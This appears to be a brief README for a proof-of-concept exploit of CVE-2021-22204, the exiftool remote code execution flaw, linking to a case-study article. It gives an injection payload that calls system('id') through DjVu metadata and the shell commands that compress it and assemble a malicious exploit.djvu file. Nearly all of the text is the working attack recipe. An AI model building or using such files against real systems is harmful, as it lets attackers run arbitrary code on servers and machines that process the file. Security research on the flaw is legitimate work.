# CVE-2021-22204

* Craft an a payload and execute it via exiftool
* [Article](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/)

## Usage
* Payload is `(metadata "\c${system('id')};")`
```sh
sudo apt install djvulibre-bin
bzz payload payload.bzz
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
```